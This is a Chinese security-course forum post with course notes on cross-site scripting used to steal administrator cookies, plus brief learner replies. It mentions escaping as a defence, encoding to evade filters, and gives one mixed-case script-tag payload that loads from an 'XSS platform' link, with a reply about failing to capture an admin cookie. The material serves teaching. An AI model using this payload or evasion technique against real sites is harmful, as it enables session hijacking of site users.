2.3、Xss跨站脚本攻击— 通过cookie伪造目标权限【直播回放-课件贴】

admin   ·   发表于 2018-3-29   ·   公开课学院


PPT、课程直播、回放已打包至附件! 

直播回放观看:https://ke.qq.com/course/275794?tuin=62e148

解压密码:zkaq.org


1、如何防御xss? 在关键字符上进行转义输出

   我们在进行数据库下载的时候,将databse下载了下来,读了管理员密码,&#%@不能被URL正常解析的。

2、<>→lg、gt 是可以被当作正常解析的

3、当我们进行注入绕过、XSS绕过的时候,也会用到非常多的编码手段进行绕过。这些编码能够让过滤认不出来,但浏览器能够正常识别

4、<sCRiPt sRC=XSS平台的链接></sCrIpT>


打赏我,让我更有动力~

Attachment List

3-4.7z   File Size:1.491M (Download Count:40)   Price:2

9 Reply   |  Until 2个月前 | 1701 View

jiedu520
发表于 2018-4-1

上边的连接失效了?

评论列表

  • 加载数据中...

编写评论内容

pklong007
发表于 2018-4-2

上面的连接的确失效了,附件的还回放也打不开

评论列表

  • 加载数据中...

编写评论内容

admin
发表于 2018-4-2

可以正常使用哦!大家刷新一下帖子

评论列表

  • 加载数据中...

编写评论内容

1270808374
发表于 2018-4-27

6666

评论列表

  • 加载数据中...

编写评论内容

ton2018
发表于 2018-9-5

666666666666666666666666666666666666666666

评论列表

  • 加载数据中...

编写评论内容

864691690
发表于 11个月前

下载一下

评论列表

  • 加载数据中...

编写评论内容

zhao9170
发表于 9个月前

66666666

评论列表

  • 加载数据中...

编写评论内容

太期待丶
发表于 5个月前

机器人是不是坏了  插入xss代码之后拿不到管理员访问的cookie

评论列表

  • 加载数据中...

编写评论内容

guren
发表于 2个月前

试试

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content

掌控者 © 2016. All Rights Reserved. 掌控者

Powered by 掌控者 Version 2.1.3